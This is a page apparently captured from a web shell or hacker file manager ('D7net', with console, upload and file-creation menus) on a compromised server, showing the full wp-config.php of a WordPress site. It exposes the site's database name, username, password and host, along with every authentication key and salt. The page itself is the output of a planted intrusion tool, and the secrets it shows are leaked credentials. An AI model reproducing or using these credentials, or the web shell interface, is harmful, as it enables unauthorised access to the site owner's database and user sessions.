D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
home
/
skyconb
/
liveyacine
/
Filename :
wp-config.php
back
Copy
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://wordpress.org/documentation/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'skyconbtc' ); /** Database username */ define( 'DB_USER', 'skyconbtc' ); /** Database password */ define( 'DB_PASSWORD', 'Touati1990' ); /** Database hostname */ define( 'DB_HOST', 'skyconbtc.mysql.db' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8mb4' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', '+~zDPl?iUE=/LlE_a;&ii$X@Ems0QD/DUqKzH2Zcrmv1X{oK{Oq(Zbd#J*q]_qYW' ); define( 'SECURE_AUTH_KEY', 'K;R|D:l>*Tch&=w~!8.m&:j$w9{nQ8`MN;>NB<)?J6)xhc~Nt}e3vxv-2v[D]Mjd' ); define( 'LOGGED_IN_KEY', '(<<bT<KRT{SHj/-Qp58c#j~BJNMqD@N-#`Ep^+G^NiAip~.B=wIHpm9k3{T3*-PT' ); define( 'NONCE_KEY', 'id?q#nVF?w**<@&5?C}Z:ljMJl%Ph3^8<F/:[5#+[?1.eybfnMNra~ozQOBj{2-,' ); define( 'AUTH_SALT', 'WsMgMh-VsO7%/1v(b$gKI0 GtC-/8I|(AyGxtGn}`aPNn,kv&#rWi}526FTRr[R' ); define( 'SECURE_AUTH_SALT', '6lWYVuR*t*q!pE82,M]JA<<GIEF?xk^EbU4)Gxy8S9Ahw}Dx?hLt+P6#qR+Q@8s(' ); define( 'LOGGED_IN_SALT', ';M&r*>(3EDcdq*&!]<>s*oVUK<q-1h?y!aYw?;5r`/}(V=%jf/GZ[A&3{m*b|QR>' ); define( 'NONCE_SALT', '(dZ^Jlvz[uQUE!yMr$K_b9:Ragee/W]JwM|a$: &3x=%{*Ps(QZjD9Kw/W&1tP31' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_98763'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/documentation/article/debugging-in-wordpress/ */ define( 'WP_DEBUG', false ); /* Add any custom values between this line and the "stop editing" line. */ /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';